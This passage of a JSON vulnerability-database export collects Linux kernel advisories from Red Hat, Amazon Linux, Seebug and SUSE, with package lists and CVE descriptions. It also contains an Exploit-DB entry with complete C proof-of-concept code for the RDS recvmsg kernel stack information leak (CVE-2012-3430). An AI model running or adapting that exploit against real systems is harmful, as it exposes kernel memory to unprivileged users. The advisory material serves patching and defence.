"OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "s390x", "packageFilename": "kernel-devel-2.6.18-348.18.1.el5.s390x.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "s390x", "packageFilename": "kernel-headers-2.6.18-348.18.1.el5.s390x.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "s390x", "packageFilename": "kernel-kdump-devel-2.6.18-348.18.1.el5.s390x.rpm", "packageName": "kernel-kdump-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-debuginfo-2.6.18-348.18.1.el5.ia64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ia64", "packageFilename": "kernel-debuginfo-2.6.18-348.18.1.el5.ia64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ia64", "packageFilename": "kernel-debuginfo-common-2.6.18-348.18.1.el5.ia64.rpm", "packageName": "kernel-debuginfo-common", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-debuginfo-2.6.18-348.18.1.el5.ia64.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ia64", "packageFilename": "kernel-2.6.18-348.18.1.el5.ia64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-devel-2.6.18-348.18.1.el5.ia64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-2.6.18-348.18.1.el5.ia64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ia64", "packageFilename": "kernel-devel-2.6.18-348.18.1.el5.ia64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-devel-2.6.18-348.18.1.el5.ia64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ia64", "packageFilename": "kernel-headers-2.6.18-348.18.1.el5.ia64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-2.6.18-348.18.1.el5.ia64.rpm", "packageName": "kernel-xen", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A use-after-free flaw was found in the madvise() system call\nimplementation in the Linux kernel. A local, unprivileged user could use\nthis flaw to cause a denial of service or, potentially, escalate their\nprivileges. (CVE-2012-3511, Moderate)\n\n* A flaw was found in the way the Linux kernel's TCP/IP protocol suite\nimplementation handled IPv6 sockets that used the UDP_CORK option. A local,\nunprivileged user could use this flaw to cause a denial of service.\n(CVE-2013-4162, Moderate)\n\n* An information leak flaw in the Linux kernel could allow a local,\nunprivileged user to leak kernel memory to user-space. (CVE-2013-2141, Low)\n\nRed Hat would like to thank Hannes Frederic Sowa for reporting\nCVE-2013-4162.\n\nThis update also fixes the following bugs:\n\n* A bug in the be2net driver prevented communication between NICs using\nbe2net. This update applies a patch addressing this problem along with\nseveral other upstream patches that fix various other problems. Traffic\nbetween NICs using the be2net driver now proceeds as expected. (BZ#983864)\n\n* A recent patch fixing a problem that prevented communication between\nNICs using the be2net driver caused the firmware of NICs to become\nunresponsive, and thus triggered a kernel panic. The problem was caused by\nunnecessary usage of a hardware workaround that allows skipping VLAN tag\ninsertion. A patch has been applied and the workaround is now used only\nwhen the multi-channel configuration is enabled on the NIC. Note that the\nbug only affected the NICs with firmware version 4.2.xxxx. (BZ#999819)\n\n* A bug in the autofs4 mount expiration code could cause the autofs4\nmodule to falsely report a busy tree of NFS mounts as \"not in use\".\nConsequently, automount attempted to unmount the tree and failed with\na \"failed to umount offset\" error, leaving the mount tree to appear as\nempty directories. A patch has been applied to remove an incorrectly used\nautofs dentry mount check and the aforementioned problem no longer occurs.\n(BZ#1001488)\n\n* A race condition in the be_open function in the be2net driver could\ntrigger the BUG_ON() macro, which resulted in a kernel panic. A patch\naddressing this problem has been applied and the race condition is now\navoided by enabling polling before enabling interrupts globally. The\nkernel no longer panics in this situation. (BZ#1005239)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "reporter": "RedHat", "published": "2013-09-26T04:00:00", "type": "redhat", "title": "(RHSA-2013:1292) Moderate: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3511", "CVE-2013-2141", "CVE-2013-4162"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T11:55:29", "id": "RHSA-2013:1292", "href": "https://access.redhat.com/errata/RHSA-2013:1292", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T06:03:54", "osvdbidlist": ["85606"], "references": [], "description": "Linux Kernel 2.6.x 'rds_recvmsg()' Function Local Information Disclosure Vulnerability. CVE-2012-3430. Local exploit for linux platform", "edition": 1, "reporter": "Jay Fenlason", "published": "2012-07-26T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "exploitdb", "title": "Linux Kernel 2.6.x 'rds_recvmsg' Function Local Information Disclosure Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-3430"], "modified": "2012-07-26T00:00:00", "id": "EDB-ID:37543", "href": "https://www.exploit-db.com/exploits/37543/", "sourceData": "source: http://www.securityfocus.com/bid/54702/info\r\n\r\nThe Linux kernel is prone to a local information-disclosure vulnerability.\r\n\r\nLocal attackers can exploit this issue to obtain sensitive information that may lead to further attacks. \r\n\r\n/***************** rds_client.c ********************/\r\n\r\nint main(void)\r\n{\r\nint sock_fd;\r\nstruct sockaddr_in serverAddr;\r\nstruct sockaddr_in toAddr;\r\nchar recvBuffer[128] = \"data from client\";\r\nstruct msghdr msg;\r\nstruct iovec iov;\r\n\r\nsock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0);\r\nif (sock_fd < 0) {\r\nperror(\"create socket error\\n\");\r\nexit(1);\r\n}\r\n\r\nmemset(&serverAddr, 0, sizeof(serverAddr));\r\nserverAddr.sin_family = AF_INET;\r\nserverAddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\r\nserverAddr.sin_port = htons(4001);\r\n\r\nif (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) {\r\nperror(\"bind() error\\n\");\r\nclose(sock_fd);\r\nexit(1);\r\n}\r\n\r\nmemset(&toAddr, 0, sizeof(toAddr));\r\ntoAddr.sin_family = AF_INET;\r\ntoAddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\r\ntoAddr.sin_port = htons(4000);\r\nmsg.msg_name = &toAddr;\r\nmsg.msg_namelen = sizeof(toAddr);\r\nmsg.msg_iov = &iov;\r\nmsg.msg_iovlen = 1;\r\nmsg.msg_iov->iov_base = recvBuffer;\r\nmsg.msg_iov->iov_len = strlen(recvBuffer) + 1;\r\nmsg.msg_control = 0;\r\nmsg.msg_controllen = 0;\r\nmsg.msg_flags = 0;\r\n\r\nif (sendmsg(sock_fd, &msg, 0) == -1) {\r\nperror(\"sendto() error\\n\");\r\nclose(sock_fd);\r\nexit(1);\r\n}\r\n\r\nprintf(\"client send data:%s\\n\", recvBuffer);\r\n\r\nmemset(recvBuffer, '\\0', 128);\r\n\r\nmsg.msg_name = &toAddr;\r\nmsg.msg_namelen = sizeof(toAddr);\r\nmsg.msg_iov = &iov;\r\nmsg.msg_iovlen = 1;\r\nmsg.msg_iov->iov_base = recvBuffer;\r\nmsg.msg_iov->iov_len = 128;\r\nmsg.msg_control = 0;\r\nmsg.msg_controllen = 0;\r\nmsg.msg_flags = 0;\r\nif (recvmsg(sock_fd, &msg, 0) == -1) {\r\nperror(\"recvmsg() error\\n\");\r\nclose(sock_fd);\r\nexit(1);\r\n}\r\n\r\nprintf(\"receive data from server:%s\\n\", recvBuffer);\r\n\r\nclose(sock_fd);\r\n\r\nreturn 0;\r\n}\r\n\r\n/***************** rds_server.c ********************/\r\n\r\nint main(void)\r\n{\r\nstruct sockaddr_in fromAddr;\r\nint sock_fd;\r\nstruct sockaddr_in serverAddr;\r\nunsigned int addrLen;\r\nchar recvBuffer[128];\r\nstruct msghdr msg;\r\nstruct iovec iov;\r\n\r\nsock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0);\r\nif(sock_fd < 0) {\r\nperror(\"create socket error\\n\");\r\nexit(0);\r\n}\r\n\r\nmemset(&serverAddr, 0, sizeof(serverAddr));\r\nserverAddr.sin_family = AF_INET;\r\nserverAddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\r\nserverAddr.sin_port = htons(4000);\r\nif (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) {\r\nperror(\"bind error\\n\");\r\nclose(sock_fd);\r\nexit(1);\r\n}\r\n\r\nprintf(\"server is waiting to receive data...\\n\");\r\nmsg.msg_name = &fromAddr;\r\n\r\n/*\r\n * I add 16 to sizeof(fromAddr), ie 32,\r\n * and pay attention to the definition of fromAddr,\r\n * recvmsg() will overwrite sock_fd,\r\n * since kernel will copy 32 bytes to userspace.\r\n *\r\n * If you just use sizeof(fromAddr), it works fine.\r\n * */\r\nmsg.msg_namelen = sizeof(fromAddr) + 16;\r\n/* msg.msg_namelen = sizeof(fromAddr); */\r\nmsg.msg_iov = &iov;\r\nmsg.msg_iovlen = 1;\r\nmsg.msg_iov->iov_base = recvBuffer;\r\nmsg.msg_iov->iov_len = 128;\r\nmsg.msg_control = 0;\r\nmsg.msg_controllen = 0;\r\nmsg.msg_flags = 0;\r\n\r\nwhile (1) {\r\nprintf(\"old socket fd=%d\\n\", sock_fd);\r\nif (recvmsg(sock_fd, &msg, 0) == -1) {\r\nperror(\"recvmsg() error\\n\");\r\nclose(sock_fd);\r\nexit(1);\r\n}\r\nprintf(\"server received data from client:%s\\n\", recvBuffer);\r\nprintf(\"msg.msg_namelen=%d\\n\", msg.msg_namelen);\r\nprintf(\"new socket fd=%d\\n\", sock_fd);\r\nstrcat(recvBuffer, \"--data from server\");\r\nif (sendmsg(sock_fd, &msg, 0) == -1) {\r\nperror(\"sendmsg()\\n\");\r\nclose(sock_fd);\r\nexit(1);\r\n}\r\n}\r\n\r\nclose(sock_fd);\r\nreturn 0;\r\n}\r\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37543/"}], "seebug": [{"lastseen": "2017-11-19T17:49:44", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "BUGTRAQ ID: 54702\r\nCVE ID: CVE-2012-3430\r\n\r\nLinux Kernel\u662fLinux\u64cd\u4f5c\u7cfb\u7edf\u7684\u5185\u6838\u3002\r\n\r\nLinux Kernel\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u672c\u5730\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u9020\u6210\u4fe1\u606f\u6cc4\u9732\u3002\r\n0\r\nLinux kernel 2.6.x\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.kernel.org/", "reporter": "Root", "published": "2012-07-27T00:00:00", "type": "seebug", "title": "Linux kernel 2.6.x 'rds_recvmsg()'\u51fd\u6570\u672c\u5730\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2012-3430"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2012-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60297", "id": "SSV:60297", "sourceData": "", "sourceHref": "", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "status": "poc,details"}, {"lastseen": "2017-11-19T17:49:19", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "BUGTRAQ ID: 55151\r\nCVE ID: CVE-2012-3511\r\n\r\nLinux Kernel\u5176\u57fa\u7840\u4e3alinux\u5e73\u53f0\uff0clinux\u4e3aC\u8bed\u8a00\u7f16\u5199\u7684\u5185\u6838\uff0c\u57fa\u4e8e\u6b64\u5185\u6838\u53c8\u884d\u751f\u51fa\u4e86\u5177\u4f53\u7684Red hat linux \u3001open suse linux\u7b49\u5177\u4f53\u7684\u64cd\u4f5c\u7cfb\u7edf\uff0c\u4e00\u5957\u57fa\u4e8eLinux\u5185\u6838\u7684\u5b8c\u6574\u64cd\u4f5c\u7cfb\u7edf\u53eb\u4f5cLinux\u64cd\u4f5c\u7cfb\u7edf\uff0c\u6216\u662fGNU/Linux\u3002\r\n\r\nLinux Kernel\u5728 &quot;madvise_remove()&quot; \u51fd\u6570\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u91ca\u653e\u540e\u91cd\u7528\u6f0f\u6d1e\uff0c\u53ef\u88ab\u6076\u610f\u672c\u5730\u7528\u6237\u5229\u7528\u9020\u6210\u5f15\u7528\u5df2\u7ecf\u91ca\u653e\u7684\u5185\u5b58\u3002\n0\nLinux kernel 3.4.x\r\nLinux kernel 3.2.x\r\nLinux kernel 3.0.x\r\nLinux kernel 2.6.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.kernel.org/", "reporter": "Root", "published": "2012-08-26T00:00:00", "type": "seebug", "title": "Linux Kernel 'madvise_remove()'\u51fd\u6570\u672c\u5730\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2012-3511"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2012-08-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60348", "id": "SSV:60348", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "status": "details"}], "amazon": [{"lastseen": "2016-09-28T21:04:08", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "x86_64", "packageFilename": "kernel-headers-3.2.28-45.62.amzn1.x86_64", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "i686", "packageFilename": "kernel-headers-3.2.28-45.62.amzn1.i686", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "i686", "packageFilename": "kernel-devel-3.2.28-45.62.amzn1.i686", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "x86_64", "packageFilename": "kernel-3.2.28-45.62.amzn1.x86_64", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "x86_64", "packageFilename": "kernel-devel-3.2.28-45.62.amzn1.x86_64", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "x86_64", "packageFilename": "kernel-debuginfo-3.2.28-45.62.amzn1.x86_64", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "i686", "packageFilename": "kernel-3.2.28-45.62.amzn1.i686", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "x86_64", "packageFilename": "kernel-tools-3.2.28-45.62.amzn1.x86_64", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-3.2.28-45.62.amzn1.x86_64", "packageName": "kernel-debuginfo-common-x86_64", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "i686", "packageFilename": "kernel-debuginfo-3.2.28-45.62.amzn1.i686", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "noarch", "packageFilename": "kernel-doc-3.2.28-45.62.amzn1.noarch", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "i686", "packageFilename": "kernel-debuginfo-common-i686-3.2.28-45.62.amzn1.i686", "packageName": "kernel-debuginfo-common-i686", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "src", "packageFilename": "kernel-3.2.28-45.62.amzn1.src", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "i686", "packageFilename": "kernel-tools-3.2.28-45.62.amzn1.i686", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "i686", "packageFilename": "kernel-tools-debuginfo-3.2.28-45.62.amzn1.i686", "packageName": "kernel-tools-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.28-45.62", "arch": "x86_64", "packageFilename": "kernel-tools-debuginfo-3.2.28-45.62.amzn1.x86_64", "packageName": "kernel-tools-debuginfo", "operator": "lt"}], "edition": 1, "description": "**Issue Overview:**\n\nThe rds_recvmsg function in net/rds/recv.c in the Linux kernel before 3.0.44 does not initialize a certain structure member, which allows local users to obtain potentially sensitive information from kernel stack memory via a (1) recvfrom or (2) recvmsg system call on an RDS socket.\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running. \n\n \n**New Packages:**\n \n \n i686: \n kernel-tools-debuginfo-3.2.28-45.62.amzn1.i686 \n kernel-3.2.28-45.62.amzn1.i686 \n kernel-debuginfo-common-i686-3.2.28-45.62.amzn1.i686 \n kernel-devel-3.2.28-45.62.amzn1.i686 \n kernel-headers-3.2.28-45.62.amzn1.i686 \n kernel-tools-3.2.28-45.62.amzn1.i686 \n kernel-debuginfo-3.2.28-45.62.amzn1.i686 \n \n noarch: \n kernel-doc-3.2.28-45.62.amzn1.noarch \n \n src: \n kernel-3.2.28-45.62.amzn1.src \n \n x86_64: \n kernel-tools-3.2.28-45.62.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.2.28-45.62.amzn1.x86_64 \n kernel-devel-3.2.28-45.62.amzn1.x86_64 \n kernel-headers-3.2.28-45.62.amzn1.x86_64 \n kernel-debuginfo-3.2.28-45.62.amzn1.x86_64 \n kernel-tools-debuginfo-3.2.28-45.62.amzn1.x86_64 \n kernel-3.2.28-45.62.amzn1.x86_64 \n \n \n", "reporter": "Amazon", "published": "2012-08-21T21:04:00", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "amazon", "title": "Medium: kernel", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3430"], "modified": "2014-09-14T16:51:00", "id": "ALAS-2012-118", "href": "https://alas.aws.amazon.com/ALAS-2012-118.html", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-28T21:03:57", "references": ["https://rhn.redhat.com/errata/RHSA-2012-1304.html"], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "i686", "packageFilename": "kernel-headers-3.2.30-49.59.amzn1.i686", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "noarch", "packageFilename": "kernel-doc-3.2.30-49.59.amzn1.noarch", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-3.2.30-49.59.amzn1.x86_64", "packageName": "kernel-debuginfo-common-x86_64", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "i686", "packageFilename": "kernel-tools-3.2.30-49.59.amzn1.i686", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "i686", "packageFilename": "kernel-debuginfo-3.2.30-49.59.amzn1.i686", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "i686", "packageFilename": "kernel-debuginfo-common-i686-3.2.30-49.59.amzn1.i686", "packageName": "kernel-debuginfo-common-i686", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "x86_64", "packageFilename": "kernel-devel-3.2.30-49.59.amzn1.x86_64", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "x86_64", "packageFilename": "kernel-headers-3.2.30-49.59.amzn1.x86_64", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "src", "packageFilename": "kernel-3.2.30-49.59.amzn1.src", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "x86_64", "packageFilename": "kernel-debuginfo-3.2.30-49.59.amzn1.x86_64", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "i686", "packageFilename": "kernel-tools-debuginfo-3.2.30-49.59.amzn1.i686", "packageName": "kernel-tools-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "i686", "packageFilename": "kernel-3.2.30-49.59.amzn1.i686", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "x86_64", "packageFilename": "kernel-tools-debuginfo-3.2.30-49.59.amzn1.x86_64", "packageName": "kernel-tools-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "x86_64", "packageFilename": "kernel-tools-3.2.30-49.59.amzn1.x86_64", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "i686", "packageFilename": "kernel-devel-3.2.30-49.59.amzn1.i686", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.2.30-49.59", "arch": "x86_64", "packageFilename": "kernel-3.2.30-49.59.amzn1.x86_64", "packageName": "kernel", "operator": "lt"}], "edition": 1, "description": "**Issue Overview:**\n\nAn integer overflow flaw was found in the i915_gem_do_execbuffer() function in the Intel i915 driver in the Linux kernel. A local, unprivileged user could use this flaw to cause a denial of service. This issue only affected 32-bit systems. ([CVE-2012-2384 __](<https://access.redhat.com/security/cve/CVE-2012-2384>), Moderate)\n\nA memory leak flaw was found in the way the Linux kernel's memory subsystem handled resource clean up in the mmap() failure path when the MAP_HUGETLB flag was set. A local, unprivileged user could use this flaw to cause a denial of service. ([CVE-2012-2390 __](<https://access.redhat.com/security/cve/CVE-2012-2390>), Moderate)\n\nA race condition was found in the way access to inet->opt ip_options was synchronized in the Linux kernel's TCP/IP protocol suite implementation. Depending on the network facing applications running on the system, a remote attacker could possibly trigger this flaw to cause a denial of service. A local, unprivileged user could use this flaw to cause a denial of service regardless of the applications the system runs. ([CVE-2012-3552 __](<https://access.redhat.com/security/cve/CVE-2012-3552>), Moderate)\n\nA flaw was found in the way the Linux kernel's dl2k driver, used by certain D-Link Gigabit Ethernet adapters, restricted IOCTLs. A local, unprivileged user could use this flaw to issue potentially harmful IOCTLs, which could cause Ethernet adapters using the dl2k driver to malfunction (for example, losing network connectivity). ([CVE-2012-2313 __](<https://access.redhat.com/security/cve/CVE-2012-2313>), Low)\n\nA flaw was found in the way the msg_namelen variable in the rds_recvmsg() function of the Linux kernel's Reliable Datagram Sockets (RDS) protocol implementation was initialized. A local, unprivileged user could use this flaw to leak kernel stack memory to user-space. ([CVE-2012-3430 __](<https://access.redhat.com/security/cve/CVE-2012-3430>), Low)\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running. \n\n \n**New Packages:**\n \n \n i686: \n kernel-tools-3.2.30-49.59.amzn1.i686 \n kernel-tools-debuginfo-3.2.30-49.59.amzn1.i686 \n kernel-devel-3.2.30-49.59.amzn1.i686 \n kernel-debuginfo-common-i686-3.2.30-49.59.amzn1.i686 \n kernel-3.2.30-49.59.amzn1.i686 \n kernel-headers-3.2.30-49.59.amzn1.i686 \n kernel-debuginfo-3.2.30-49.59.amzn1.i686 \n \n noarch: \n kernel-doc-3.2.30-49.59.amzn1.noarch \n \n src: \n kernel-3.2.30-49.59.amzn1.src \n \n x86_64: \n kernel-debuginfo-3.2.30-49.59.amzn1.x86_64 \n kernel-tools-3.2.30-49.59.amzn1.x86_64 \n kernel-3.2.30-49.59.amzn1.x86_64 \n kernel-devel-3.2.30-49.59.amzn1.x86_64 \n kernel-tools-debuginfo-3.2.30-49.59.amzn1.x86_64 \n kernel-headers-3.2.30-49.59.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.2.30-49.59.amzn1.x86_64 \n \n \n", "reporter": "Amazon", "published": "2012-10-08T10:43:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "amazon", "title": "Medium: kernel", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2390", "CVE-2012-2313", "CVE-2012-2384", "CVE-2012-3552", "CVE-2012-3430"], "modified": "2014-09-14T17:09:00", "id": "ALAS-2012-133", "href": "https://alas.aws.amazon.com/ALAS-2012-133.html", "cvss": {"score": 5.4, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:27:15", "references": ["https://bugzilla.novell.com/781134", "https://bugzilla.novell.com/779432", "https://bugzilla.novell.com/762693", "https://bugzilla.novell.com/772831", "https://bugzilla.novell.com/772566", "https://bugzilla.novell.com/778630", "https://bugzilla.novell.com/774859", "https://bugzilla.novell.com/780624", "https://bugzilla.novell.com/774523", "https://bugzilla.novell.com/773406", "https://bugzilla.novell.com/772923", "https://bugzilla.novell.com/776925", "https://bugzilla.novell.com/771392", "https://bugzilla.novell.com/765230"], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-default", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-desktop-devel-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-desktop-devel-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", 